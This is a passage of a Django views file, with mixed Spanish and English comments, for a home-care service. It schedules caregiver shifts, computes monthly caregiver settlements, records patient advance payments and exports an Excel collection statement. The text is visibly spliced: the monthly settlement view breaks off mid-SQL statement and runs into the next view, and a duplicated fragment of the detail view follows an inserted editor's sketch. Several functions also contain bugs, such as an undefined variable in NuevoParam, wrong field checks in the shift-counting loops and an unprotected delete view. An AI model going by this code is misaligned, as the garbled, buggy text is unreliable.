tipo caracter\n\t\t\t#\t\n\t\t\t#recar_x = request.POST.get('reca_apod') # recargo x festivo al apoderado\n\t\t\t#pauta.recargo = recar_x\t\n\t\t\t#\n\t\t\t#\n\t\t\t# NUEVO\n\t\t\trecacui_x = request.POST.get('reca_cui') # recargo x festivo al apoderado\n\t\t\tpauta.reca_cui = recacui_x\t\n\n\t\t\t# valores de variables asignadas a campos antes de grabar \n\t\t\tfor r in turno1:\t# barre cuidadores\n\t\t\t\tif r.rut == rut_t1 and r.rut != '0-0':\n\t\t \t\t\tpauta.turno1 = r.nombre\t\n\t\t \t\t\tpauta.valor_t1 = r.apago1 \t# costo cuidador turno1\n\t\t \t\t\tpauta.valor_p1 = valorp1\t# pago del paciente\n\n\t\t\tfor r in turno2:\n\t\t\t\tif r.rut == rut_t2 and r.rut != '0-0':\n\t\t \t\t\tpauta.turno2 = r.nombre\n\t\t \t\t\tpauta.valor_t2 = r.apago2\t# costo cuidador turno2\n\t\t \t\t\tpauta.valor_p2 = valorp2\t# pago del paciente\n\n\n\t\t\tfor r in turno3:\n\t\t\t\tif r.rut == rut_t3 and r.rut != '0-0':\n\t\t \t\t\tpauta.turno3 = r.nombre\t\n\t\t \t\t\tpauta.valor_t3 = r.apago3\t# costo cuidador turno3\n\t\t \t\t\tpauta.valor_p3 = valorp3\t# pago del paciente\n\n\t\t\tform.save()\n\t\t\treturn redirect('grid_pauta')\n\t\telse:\n\t\t\treturn HttpResponse(\"Algo salió mal y no ha grabado\"+str(form))\n\n\t#despliega el template para modificacion\n\tform = PautaForm(instance=pauta) # trae el registro completo\n\tvar_yace = pauta.yace\n\t#\n\tif pauta.reca_cui == None:\n\t\tpauta.reca_cui = '0'\n\tvar_reca = aReca_apod[int(pauta.reca_cui)] # obtiene la glosa del arreglo\n\t# \n\tvar_tip1 = 
tipo_turno[int(pauta.tipo_turno1)]\t# label from the array\n\tvar_tip2 = tipo_turno[int(pauta.tipo_turno2)]\n\tvar_tip3 = tipo_turno[int(pauta.tipo_turno3)]\n\n\tform.fecha = fecha\t# 11-06-2020\n\n\tcontext = {\n\t\t\t\"form\":form,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"napod\":napod,\n\t\t\t\"yace\":yace,\n\t\t\t\"var_yace\":var_yace,\n\t\t\t\"turno1\":turno1,\n\t\t\t\"turno2\":turno2,\n\t\t\t\"turno3\":turno3,\n\t\t\t\"var_rutcui1\":var_rutcui1,\n\t\t\t\"var_rutcui2\":var_rutcui2,\n\t\t\t\"var_rutcui3\":var_rutcui3,\n\t\t\t\"var_tip1\":var_tip1,\n\t\t\t\"var_tip2\":var_tip2,\n\t\t\t\"var_tip3\":var_tip3,\n\t\t\t\"tipo_turno\":tipo_turno,\n\t\t\t\"aReca_apod\":aReca_apod,\n\t\t\t\"var_reca\":var_reca,\n\t\t\t}\n\treturn render(request,'ficha_pauta.html',context)\n\n\ndef is_int(s):\n    # NOTE: returns the converted int (falsy for \"0\") or False on failure\n    try:\n        return int(s)\n    except ValueError:\n        return False\n\n# used from JS\ndef Eliminapac_nuevo(request,id):\n\tform = Pacientes.objects.get(id=id)\n\tform.delete()\n\treturn redirect('grid_pacientes')\t# redirect to the URL\n\n# SETTLEMENT REPORTS\n@login_required(login_url='login_ini')\ndef info(request):\n\tvariable1 = 'Liquidación Mensual de Cuidadores/Asistentes'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo_excel2 = \"/static/img/EXCEL0D2.ICO\"\n\tfechahoy = datetime.now()\n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t# array indices start at zero\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# month as a word\n\tmes_numerico = fechahoy.month\t# month as a number\n\t#\n\t# pauta for the current month only\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1]\t# total days in the month\n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\tcuidador = Cuidadores.objects.all().exclude(rut='0-0').order_by('rut')\n\tresupauta = Resupauta.objects.all()\t# pauta summary; lazy, evaluated after the inserts below\n\tResupauta.objects.all().delete()\t# clear the table\n\t#\n\t# clear and repopulate ai_pauta_aux (pautas within the date range)\n\tPauta_aux.objects.all().delete()\n\n\t# clear ai_pagocui_aux (for INFO, the caregivers' Excel statement)\n\tPagocui_aux.objects.all().delete()\n\n\t# rows in the date range whose valor_t1..t3 are not all empty\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin)).exclude(valor_t1__exact=None,valor_t2__exact=None,valor_t3__exact=None)\n\n\tfor pau in pauta:\n\t\tcursor = connection.cursor()\t# requires: from django.db import connection\n\t\tcursor.execute(\"insert into ai_pauta_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno1,rut_t2,turno2,tipo_turno2,rut_t3,turno3,tipo_turno3,valor_t1,valor_t2,valor_t3,reca_cui,valor_p1,valor_p2,valor_p3)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s, 
%s,%s,%s,%s)\",\n\t\t[pau.rut,pau.paciente,pau.fecha,\n\t\tpau.rut_t1,pau.turno1,pau.tipo_turno1,\n\t\tpau.rut_t2,pau.turno2,pau.tipo_turno2,\n\t\tpau.rut_t3,pau.turno3,pau.tipo_turno3,\n\t\tpau.valor_t1,pau.valor_t2,pau.valor_t3,pau.reca_cui,\n\t\tpau.valor_p1,pau.valor_p2,pau.valor_p3,\n\t\t])\n\n\tdias = []\n\tk=1\n\tfor i in range(31):\n\t\tdias.append(k)\n\t\tk=k+1\n\n\t# define 3 años para atras + uno para adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\n\tcuenta = 0\n\tfor ss in cuidador:\n\t\tcuenta = cuenta + 1\n\n\tfor zz in cuidador:\n\t\trut_x = zz.rut\n\t\tnombre_x = zz.nombre\n\n\t\t#cuantos turnos de MAÑANA\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t1=rut_x)\n\t\tt1 = 0\t# total turnos\n\t\tvt1 = 0\n\t\tif pauta.exists() != False: # si el filtro arroja vacio o no\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.valor_t1 != None:\n\t\t\t\t\tt1=t1 + 1\t\n\t\t\t\t\tvt1 = vt1 + int(ww.valor_t1) # valor total de turnos MAÑANA\n\n\t\t#cuantos turnos de TARDE\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t2=rut_x)\n\t\tt2 = 0 # total turnos\n\t\tvt2 = 0\n\t\tif pauta.exists() != False: # si el filtro arroja vacio o no\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.valor_t1 != None:\n\t\t\t\t\tt2=t2 + 1\n\t\t\t\t\tvt2 = vt2 + int(ww.valor_t2) # valor total de turnos TARDE\n\n\t\t#cuantos turnos de NOCHE\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t3=rut_x)\n\t\tt3 = 0 # total turnos\n\t\tvt3 = 0\n\t\tif pauta.exists() != False: # si el filtro arroja vacio o no\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.valor_t1 != None:\n\t\t\t\t\tt3=t3 + 1\n\t\t\t\t\tvt3 = vt3 + int(ww.valor_t3)\t## valor total de turnos NOCHE\n\n\t\ttot_val = vt1 + vt2+ vt3\t\t\n\t\t\n\t\tmes_yy = str(mes_numerico).zfill(2)\n\n\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\tcursor.execute(\"insert into ai_resupauta (rut,nombre,mes,ano,tot_t1,tot_t2,tot_t3,tot_val)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,nombre_x,mes_yy,ano_hoy,t1,t2,t3,tot_val])\n\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin))\n\t\t# Insertar para este cuidador en particular\n\t\tif pauta.exists() != False: # si el filtro arroja no vacio\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.rut_t1 == rut_x or ww.rut_t2 == rut_x or ww.rut_t3 == rut_x:\n\t\t\t\t\tcursor = connection.cursor()\n\t\t\t\t\tif ww.rut_t1 == rut_x: # cuidador es el ok ?\n\t\t\t\t\t\t#return HttpResponse(\"Entro en turno1\"+str(xx))\n\t\t\t\t\t\tcursor.execute(\"insert into ai_pagocui_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno,valor,reca_cui,turno)\"\n\t\t\t\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t,[ww.rut,ww.paciente,ww.fecha,ww.rut_t1,ww.turno1,ww.tipo_turno1,ww.valor_t1,ww.reca_cui,\"1\"])\n\n\t\t\t\t\tif ww.rut_t2 == rut_x:\n\t\t\t\t\t\t#return HttpResponse(\"Entro en turno2\"+str(xx))\n\t\t\t\t\t\tcursor.execute(\"insert into ai_pagocui_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno,valor,reca_cui,turno)\"\n\t\t\t\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t,[ww.rut,ww.paciente,ww.fecha,ww.rut_t2,ww.turno2,ww.tipo_turno2,ww.valor_t2,ww.reca_cui,\"2\"])\n\n\t\t\t\t\tif ww.rut_t3 == rut_x:\t\n\t\t\t\t\t\t#return HttpResponse(\"Entro en turno3\"+str(xx))\n\t\t\t\t\t\tcursor.execute(\"insert into ai_pagocui_aux 
\n# Button: DISPLAY BY SELECTED DATE\n@login_required(login_url='login_ini')\ndef liquimeses(request):\n\tvariable1 = 'Liquidación Mensual de Cuidadores/Asistentes'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo_excel2 = \"/static/img/EXCEL0D2.ICO\"\n\tfechahoy = datetime.now()\n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\n\tmes_x = request.POST.get('meses')\t# from the template via method='POST'\n\tano_x = request.POST.get('ano')\n\n\t# array indices start at zero\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\tmes_hoy = meses[mes_hoy - 1]\t\t# month as a word\n\tmes_numerico = meses.index(mes_x)+1\t# month as a number\n\n\t# pauta for the selected month only\n\tfecha_ini = str(ano_x)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\ttotdias = calendar.monthrange(int(ano_x),meses.index(mes_x) + 1)[1]\t# total days in the month\n\tfecha_fin = str(ano_x)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\tcuidador = Cuidadores.objects.all().exclude(rut='0-0').order_by('nombre')\n\tresupauta = Resupauta.objects.all()\t# pauta summary; lazy, evaluated after the inserts below\n\tResupauta.objects.all().delete()\t# clear the table\n\n\t# clear and repopulate ai_pauta_aux (pautas within the date range)\n\tPauta_aux.objects.all().delete()\n\t# rows in the date range whose valor_t1..t3 are not all empty\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin)).exclude(valor_t1__exact=None,valor_t2__exact=None,valor_t3__exact=None)\n\tfor pau in pauta:\n\t\tcursor = connection.cursor()\t# requires: from django.db import connection\n\t\tcursor.execute(\"insert into ai_pauta_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno1,rut_t2,turno2,tipo_turno2,rut_t3,turno3,tipo_turno3,valor_t1,valor_t2,valor_t3,reca_cui,valor_p1,valor_p2,valor_p3)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s, %s,%s,%s,%s)\",\n\t\t[pau.rut,pau.paciente,pau.fecha,\n\t\tpau.rut_t1,pau.turno1,pau.tipo_turno1,\n\t\tpau.rut_t2,pau.turno2,pau.tipo_turno2,\n\t\tpau.rut_t3,pau.turno3,pau.tipo_turno3,\n\t\tpau.valor_t1,pau.valor_t2,pau.valor_t3,pau.reca_cui,\n\t\tpau.valor_p1,pau.valor_p2,pau.valor_p3,\n\t\t])\n\n\tdias = list(range(1, 32))\t# day numbers 1..31\n\n\t# three years back plus one ahead\n\tano = [ano_hoy - 2, ano_hoy - 1, ano_hoy, ano_hoy + 1]\n\n\tcuenta = cuidador.count()\n\n\tfor zz in cuidador:\n\t\trut_x = zz.rut\n\t\tnombre_x = zz.nombre\n\n\t\t# how many MORNING shifts\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, 
fecha_fin),rut_t1=rut_x)\n\t\tt1 = 0\n\t\tvt1 = 0\n\t\tfor ww in pauta:\n\t\t\tif ww.valor_t1 is not None:\t# guard against empty shift values\n\t\t\t\tt1 = t1 + 1\n\t\t\t\tvt1 = vt1 + int(ww.valor_t1)\t# total value of MORNING shifts\n\n\t\t# how many AFTERNOON shifts\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t2=rut_x)\n\t\tt2 = 0\n\t\tvt2 = 0\n\t\tfor ww in pauta:\n\t\t\tif ww.valor_t2 is not None:\n\t\t\t\tt2 = t2 + 1\n\t\t\t\tvt2 = vt2 + int(ww.valor_t2)\t# total value of AFTERNOON shifts\n\n\t\t# how many NIGHT shifts\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t3=rut_x)\n\t\tt3 = 0\n\t\tvt3 = 0\n\t\tfor ww in pauta:\n\t\t\tif ww.valor_t3 is not None:\n\t\t\t\tt3 = t3 + 1\n\t\t\t\tvt3 = vt3 + int(ww.valor_t3)\t# total value of NIGHT shifts\n\n\t\ttot_val = vt1 + vt2 + vt3\n\n\t\tmes_yy = str(mes_numerico).zfill(2)\n\t\tcursor = connection.cursor()\t# requires: from django.db import connection\n\t\tcursor.execute(\"insert into ai_resupauta (rut,nombre,mes,ano,tot_t1,tot_t2,tot_t3,tot_val)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,nombre_x,mes_yy,int(ano_x),t1,t2,t3,tot_val])\n\n\tcontext = {\n\t\t\"resupauta\":resupauta,\n\t\t\"variable1\":variable1,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"mes_hoy\":mes_x,\n\t\t\"ano_hoy\":int(ano_x),\n\t\t\"cuenta\":cuenta,\n\t\t\"logo_excel\":logo_excel,\n\t\t\"logo_excel2\":logo_excel2,\n\t\t\"mes_numerico\":mes_numerico,}\n\treturn render(request,'grid_info.html',context)\n\n@login_required(login_url='login_ini')\ndef Detapautaview(request,rut,resu_mes,resu_ano):\n\tvariable1 = 'Detalle Liquidación Mensual de Cuidador/Asistente'\n\tmes_hoy = resu_mes\n\tano_hoy = resu_ano\n\trut_x = rut\n\t# array indices start at zero\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\tmes_numerico = int(mes_hoy)\n\tmes_hoy = meses[mes_numerico - 1]\t# month as a word\n\t#\n\t# pauta for the selected month only\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1]\t# total days in the month\n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\t# rut_x is the caregiver's rut\n\tpauta = Pauta.objects.filter((Q(rut_t1=rut_x)|Q(rut_t2=rut_x)|Q(rut_t3=rut_x)),\n\t\tfecha__range=(fecha_ini, fecha_fin))\n\n\tnomcui = ''\t# caregiver name (default if the rut is unknown)\n\tcuidadores = Cuidadores.objects.filter(rut=rut_x)\n\tfor cui in cuidadores:\n\t\tnomcui = cui.nombre\n\n\tdetapauta = Detapauta.objects.all()\t# lazy, evaluated after the inserts below\n\tDetapauta.objects.all().delete()\t# clear the table\n\n\tcuenta = pauta.count()\t# rows to display\n\n\ttot_val = 0\n\ttotal = 0\n\tfor zz in pauta:\n\t\t# count and total the MORNING / AFTERNOON / NIGHT shifts and values\n\t\tvt1 = 0\n\t\tvt2 = 0\n\t\tvt3 = 0\n\t\tnombre_x = zz.paciente\n\t\tfecha_x = zz.fecha\n\n\t\tif zz.rut_t1 == rut_x:\n\t\t\tvt1 = vt1 + int(zz.valor_t1)\t# MORNING shift value\n\n\t\tif zz.rut_t2 == rut_x:\n\t\t\tvt2 = vt2 + int(zz.valor_t2)\t# AFTERNOON shift value\n\n\t\tif zz.rut_t3 == rut_x:\n\t\t\tvt3 = vt3 + int(zz.valor_t3)\t# NIGHT shift value\n\n\t\ttot_val = vt1 + vt2 + vt3\n\t\ttotal = total + tot_val\n\n\t\tdia_y = fecha_x.day\n\t\tmes_y = fecha_x.month\n\t\tano_y = fecha_x.year\n\n\t\tfecha_y = str(ano_y)+\"-\"+str(mes_y).zfill(2)+\"-\"+str(dia_y).zfill(2)\n\t\tfecha_y = datetime.strptime(fecha_y,'%Y-%m-%d')\t# convert the string back to a date\n\n\t\tcursor = connection.cursor()\t# requires: from django.db import connection\n\t\tcursor.execute(\"insert into ai_detapauta (rut,paciente,fecha,valor_t1,valor_t2,valor_t3,total)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,nombre_x,fecha_y,vt1,vt2,vt3,tot_val])\n\n\tcontext = {\n\t\t\"detapauta\":detapauta,\n\t\t\"variable1\":variable1,\n\t\t\"cuenta\":cuenta,\n\t\t\"total\":total,\n\t\t\"nomcui\":nomcui,}\n\treturn render(request,'grid_detapauta.html',context)\n
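\n\n# --- Editor's sketch (hypothetical, untested) ---\n# Detapautaview (and several views above) insert auxiliary rows one\n# cursor.execute at a time. bulk_create batches the same inserts through the\n# ORM in a single query; the field names match the ai_detapauta insert above\n# and graba_detapauta is an invented name.\ndef graba_detapauta(filas):\n\t\"\"\"filas: iterable of dicts with rut/paciente/fecha/valor_t1..t3/total keys.\"\"\"\n\tDetapauta.objects.bulk_create([Detapauta(**f) for f in filas])\n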
fecha\t\n\t\tfecha_y = datetime.strptime(fecha_y,'%Y-%m-%d')\n\n\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\tcursor.execute(\"insert into ai_detapauta (rut,paciente,fecha,valor_t1,valor_t2,valor_t3,total)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,nombre_x,fecha_y,vt1,vt2,vt3,tot_val])\n\n\tcontext = {\n\t\t\"detapauta\":detapauta,\n\t\t\"variable1\":variable1,\n\t\t\"cuenta\":cuenta,\n\t\t\"total\":total,\n\t\t\"nomcui\":nomcui,}\n\treturn render(request,'grid_detapauta.html',context)\n\n\n@login_required(login_url='login_ini')\ndef NuevoParam(request):\n\tvariable1 = 'Agregando nuevo parametro al Sistema'\n\t#\n\t#BOTON ACEPTAR en el template\n\tif request.method == \"POST\":\n\t\tform = ParamForm(request.POST,instance=param)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('grid_param')\n\t\telse:\n\t\t\t#falló la actualizacion\n\t\t\tform = ParamForm(instance = param)\n\t\t\tcontext = {\n\t\t\t\t\"variable1\":variable1,\n\t\t\t\t\"form\":form,\n\t\t\t\t\"id_x\":id,\n\t\t\t}\n\t\t\trender(request,'ficha_param.html',context)\n\telse:\n\t\t# x GET - puebla el template.\n\t\tform = ParamForm(request.POST or None) # trae el formulario completo\n\t\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"form\":form,}\n\treturn render(request,'ficha_param.html',context)\n\n@login_required(login_url='login_ini')\ndef Ficha_anticipos(request):\n\tvariable1 = 'Pagos o Anticipos abonados por el Apoderado'\n\terror_new = 'ok'\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day # numerico\n\tmes_hoy = fechahoy.month # numerico\n\tano_hoy = fechahoy.year # numerico\n\tbanco\t= Param.objects.filter(tipo='BCO').order_by('descrip')\t\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo') # numerico\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\t# define 3 años para atras + uno para adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\t\t\t\n\tform_anti = AnticiposForm(request.POST or None)\n\tpaciente = Pacientes_aux.objects.all()\n\tfe_ini_x = None\n\tfor ss in paciente:\n\t rut_anticipos = ss.rut\n\t nombre_paciente = ss.nombre\n\t fe_ini_x = ss.fe_ini \n\n\t# Si tiene anticipos en el periodo\n\tvalor_abono = 0\n\tif fe_ini_x != None:\n\t\tfe_i = str(fe_ini_x)[0:10] # entrega '9999-99-99'\tfecha de inicio del paciente\n\t\tfe_f = str(fechahoy)[0:10]\t\t # entrega '9999-99-99' \tfecha actual\n\t\texiste = Anticipos.objects.filter(rut=rut_anticipos,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\t\tif existe==True: \n\t\t\tanticipo = Anticipos.objects.get(rut=rut_anticipos,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\tvalor_abono = anticipo.valor\n\t\n\tswabono_x = request.POST.get('sw_abono') # pago normal / anticipo\n\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\tmes_numerico = fechahoy.month # mes en numero\n\t#fecha_actual = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(dia_hoy).zfill(2)\n\tdia_z = str(dia_hoy).zfill(2) \t# transforma a string y llena ceros izq.\n\tmes_z = meses.index(mes_hoy) + 1 # entrega el numerico del mes\n\tmes_z = str(mes_z).zfill(2)\t\t# transforma a string y llena ceros izq.\n\tfecha_actual = str(ano_hoy)+\"-\"+mes_z+\"-\"+dia_z+\" 00:00:00\" # grabar fecha en tabla. 
\tif request.method == \"POST\":\n\t\tif valor_abono > 0 and swabono_x == \"1\":\n\t\t\terror_new = \"error1\"\t# the patient already has an INITIAL DEPOSIT\n\t\telse:\n\t\t\tvariable1 = \"Despliegue de pacientes\"\n\t\t\tmes_x = request.POST.get('mes')\t\t# comes back as month-1\n\t\t\tano_x = request.POST.get('ano')\t\t# comes back as a string\n\t\t\tvar_abon = request.POST.get('abon')\t# comes back as a string\n\t\t\tvalor_x = request.POST.get('valor')\n\t\t\tnotas_x = request.POST.get('notas')\n\t\t\tmes_hoy = (str(int(mes_x)+1)).zfill(2)\t# numeric string\n\t\t\tboleta_x = request.POST.get('boleta')\n\t\t\tform_anti.mes = mes_hoy\n\t\t\tswabono_x = request.POST.get('sw_abono')\n\t\t\tbanco_x = request.POST.get('banco')\n\t\t\tcheque_x = request.POST.get('cheque')\n\t\t\t# assumes the template always supplies fecha_cheque; the time part is required\n\t\t\tfecha_ch = request.POST.get('fecha_cheque')+\" 00:00:00\"\n\n\t\t\tmes_x = int(mes_x) + 1\t# in the template, forloop.counter0 counts from 0\n\t\t\tmes_x = str(mes_x).zfill(2)\n\n\t\t\t# build the date from the selected month/year but with today's day;\n\t\t\t# this accommodates future payments/deposits\n\t\t\tfecha_actual = str(ano_x)+\"-\"+mes_x+\"-\"+dia_z+\" 00:00:00\"\n\t\t\t#\n\t\t\tcursor = connection.cursor()\t# requires: from django.db import connection\n\t\t\tcursor.execute(\"insert into ai_anticipos (rut,fecha,mes,ano,valor,abon,boleta,sw_abono,notas,banco,cheque,fecha_cheque) \"\n\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",\n\t\t\t[rut_anticipos,fecha_actual,mes_x,ano_x,valor_x,var_abon,boleta_x,swabono_x,notas_x,banco_x,cheque_x,fecha_ch])\n\n\t\t\tfalso_x = False\t# patient ENABLED / DISABLED flag\n\t\t\tpaciente = Pacientes.objects.all().order_by('nombre')\t# all patients\n\t\t\t# NOTE: error_new='error1' drives the confirmation message in the template\n\t\t\tcontext = {\n\t\t\t\t\"pacientes\":paciente,\n\t\t\t\t\"error_new\":\"error1\",\n\t\t\t\t\"falso_x\":falso_x,\n\t\t\t\t\"variable1\":variable1,\n\t\t\t\t\"paciente\":paciente,\n\t\t\t}\n\t\t\treturn render(request,'grid_pacientes.html',context)\n\n\tvar_banco = '9'\t# not assigned\n\tcontext = {\n\t\t\"form_anti\":form_anti,\n\t\t\"variable1\":variable1,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"rut_anticipos\":rut_anticipos,\n\t\t\"nombre_paciente\":nombre_paciente,\n\t\t\"fecha_actual\":fecha_actual,\n\t\t\"banco\":banco,\n\t\t\"var_banco\":var_banco,\n\t\t\"abon\":abon,\n\t\t\"error_new\":error_new,\n\t\t\"valor_abono\":valor_abono,\n\t\t}\n\treturn render(request,'ficha_anticipos.html',context)\n\n\n# COLLECTION STATEMENT (CARTOLA DE RECAUDACION) as Excel\n@login_required(login_url='login_ini')\ndef acsv(request):\n\tnom_arch = nombrearch()\t# builds the excel file name (misfunciones.py)\n\tstring_nombre = 'pac'+nom_arch\n\t#\n\tquery = Pauta_aux.objects.all().order_by('rut')\t# already filtered by date range\n\n\tfechapautas = datetime.now()\t# fallback when the aux table is empty\n\treg_x = 0\n\tfor fech_x in query:\n\t\tfechapautas = fech_x.fecha\n\t\treg_x = reg_x + 1\n\t\tif reg_x == 3:\n\t\t\tbreak\n\n\tmes_x = fechapautas.strftime('%m')\n\tano_x = fechapautas.strftime('%Y')\n\n\tfecha_ini = str(ano_x)+\"-\"+str(mes_x).zfill(2)+\"-01 00:00:00\"\n\ttotdias = calendar.monthrange(int(ano_x),int(mes_x))[1]\t# total days in the month\n\tfecha_fin = str(ano_x)+\"-\"+str(mes_x).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\t#\n\t# delete every xlsx in Downloads starting with \"cui\" (disabled)\n\t#dir = \"C:/Users/usuario/Downloads/\"\n\t#lista_ficheros = os.listdir(dir)\n\t#for fichero in lista_ficheros:\n\t#\tif fichero.startswith(\"cui\"):\n\t#\t\tos.remove(dir + fichero)\n
\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5\n\tws.column_dimensions['B'].width = 12\t# patient rut\n\tws.column_dimensions['C'].width = 36\t# patient name\n\tws.column_dimensions['D'].width = 17\t# date\n\tws.column_dimensions['E'].width = 11\t# caregiver rut\n\tws.column_dimensions['F'].width = 23\t# caregiver name\n\tws.column_dimensions['G'].width = 12\t# caregiver type\n\tws.column_dimensions['H'].width = 11\t# caregiver rut\n\tws.column_dimensions['I'].width = 23\t# caregiver name\n\tws.column_dimensions['J'].width = 12\t# caregiver type\n\tws.column_dimensions['K'].width = 11\t# caregiver rut\n\tws.column_dimensions['L'].width = 23\t# caregiver name\n\tws.column_dimensions['M'].width = 12\t# caregiver type\n\n\tws.column_dimensions['Q'].width = 12\n\tws.column_dimensions['R'].width = 14\n\tws.column_dimensions['S'].width = 12\n\tws.column_dimensions['T'].width = 14\n\n\tr = 4\t# position of the first (header) row\n\tws.cell(row=r-3,column=2).value = \"CARTOLA DE RECAUDACION\"\n\n\tws.cell(row=r-3,column=7).value = \"1=Contratado\"\n\tws.cell(row=r-2,column=7).value = \"2=Extra\"\n\n\tws.cell(row=r-3,column=20).value = \"1=Normal\"\n\tws.cell(row=r-2,column=20).value = \"2=Domingo\"\n\tws.cell(row=r-1,column=20).value = \"3=Festivo\"\n\n\tws.cell(row=r,column=2).value = \"Rut paciente\"\n\tws.cell(row=r,column=3).value = \"Paciente\"\n\tws.cell(row=r,column=4).value = \"Fecha pauta\"\n\n\tws.cell(row=r,column=5).value = \"Rut turno 1\"\n\tws.cell(row=r,column=6).value = \"Cuidador t1\"\n\tws.cell(row=r,column=7).value = \"Tipo Cuid t1\"\n\n\tws.cell(row=r,column=8).value = \"Rut turno 2\"\n\tws.cell(row=r,column=9).value = \"Cuidador t2\"\n\tws.cell(row=r,column=10).value = \"Tipo Cuid t2\"\n\n\tws.cell(row=r,column=11).value = \"Rut turno 3\"\n\tws.cell(row=r,column=12).value = \"Cuidador t3\"\n\tws.cell(row=r,column=13).value = \"Tipo Cuid t3\"\n\n\tws.cell(row=r,column=14).value = \"$ turno 1\"\n\tws.cell(row=r,column=15).value = \"$ turno 2\"\n\tws.cell(row=r,column=16).value = \"$ turno 3\"\n\n\tws.cell(row=r,column=17).value = \"$ paciente t1\"\n\tws.cell(row=r,column=18).value = \"$ paciente t2\"\n\tws.cell(row=r,column=19).value = \"$ paciente t3\"\n\n\tws.cell(row=r,column=20).value = \"recargo\"\n\tws.cell(row=r,column=21).value = \"Tot.turnos\"\n\n\ttot1 = 0\t# caregiver totals\n\ttot2 = 0\n\ttot3 = 0\n\ttot_pac1 = 0\t# patient totals (what the guardian pays)\n\ttot_pac2 = 0\n\ttot_pac3 = 0\n\n\tva1 = 0\n\tva2 = 0\n\tva3 = 0\n\n\tsubtot = 0\n\trut_x = ''\n\tr = r+1\n\tfor 